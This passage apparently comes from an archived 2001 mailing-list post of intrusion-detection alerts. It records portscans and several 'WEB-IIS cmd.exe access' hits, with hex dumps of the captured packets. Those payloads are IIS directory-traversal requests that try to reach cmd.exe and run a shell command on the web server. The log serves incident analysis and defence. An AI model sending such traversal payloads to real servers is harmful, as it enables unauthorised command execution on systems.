2E 2E 2F 2E 2E 66 2E 2E 2E 2E 2F 2E 2E 30 25 38 ../..f..../..0%8 020 : 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D 33 ../winnt/system3 030 : 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 72 2/cmd.exe?/c+dir 040 : 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A HTTP/1.0.... ***************************SCAN #3********************************************************** ---------------------------------------------------------------------------- -- #(1 - 2147) [2001-05-07 02:22:21] spp_portscan: PORTSCAN DETECTED from 210.107.187.10 (THRESHOLD 4 connections exceeded in 0 seconds) IPv4: 210.107.187.10 -> 209.46.94.85 hlen=5 TOS=0 dlen=44 ID=22549 flags=0 offset=0 TTL=238 chksum=30652 TCP: port=50799 -> dport: 80 flags=******S* seq=2338995863 ack=0 off=6 res=0 win=8760 urp=0 chksum=10291 Options: #1 - MSS len=4 data=05B40000 Payload: none ---------------------------------------------------------------------------- -- #(1 - 2181) [2001-05-07 12:01:30] WEB-IIS cmd.exe access IPv4: 210.107.187.10 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=34657 flags=0 offset=0 TTL=238 chksum=18485 TCP: port=61125 -> dport: 80 flags=***AP*** seq=941135384 ack=2710126730 off=5 res=0 win=8760 urp=0 chksum=106 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2182) [2001-05-07 12:01:31] WEB-IIS cmd.exe access IPv4: 210.107.187.10 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=34663 flags=0 offset=0 TTL=238 chksum=18479 TCP: port=61278 -> dport: 80 flags=***AP*** seq=951451170 ack=2710126742 off=5 res=0 win=8760 urp=0 chksum=39492 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ************************SCAN #4******************************************* #(1 - 2150) [2001-05-07 03:07:07] 340 IPv4: 202.107.211.177 -> 209.46.94.80 hlen=5 TOS=0 dlen=44 ID=45585 flags=0 offset=0 TTL=230 chksum=5406 TCP: port=56725 -> dport: 80 flags=******S* seq=3486124858 ack=0 off=6 res=0 win=8760 urp=0 chksum=61287 Options: #1 - MSS len=4 data=05B40000 Payload: none ---------------------------------------------------------------------------- -- #(1 - 2173) [2001-05-07 10:15:58] 62 IPv4: 202.107.211.177 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=18435 flags=0 offset=0 TTL=230 chksum=32492 TCP: port=32840 -> dport: 80 flags=***AP*** seq=1452480610 ack=2704182929 off=5 res=0 win=8760 urp=0 chksum=28623 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0.... ---------------------------------------------------------------------------- -- #(1 - 2174) [2001-05-07 10:16:00] 62 IPv4: 202.107.211.177 -> 209.46.94.82 hlen=5 TOS=0 dlen=106 ID=18441 flags=0 offset=0 TTL=230 chksum=32486 TCP: port=33972 -> dport: 80 flags=***AP*** seq=1515064652 ack=2704182931 off=5 res=0 win=8760 urp=0 chksum=30179 Payload: length = 62 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 6D c../winnt/system 020 : 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 64 69 32/cmd.exe?/c+di 030 : 72 20 48 54 54 50 2F 31 2E 30 0D 0A 0D 0A r HTTP/1.0....
This archive was generated by hypermail 2b30 : Fri May 11 2001 - 00:59:28 PDT